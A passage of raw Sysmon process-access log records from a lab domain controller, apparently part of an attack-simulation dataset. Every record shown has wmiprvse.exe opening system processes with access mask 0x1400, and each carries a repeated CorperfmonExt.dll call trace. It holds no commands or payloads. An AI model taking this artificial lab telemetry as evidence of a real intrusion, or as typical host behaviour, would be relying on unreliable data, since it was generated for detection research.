rperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 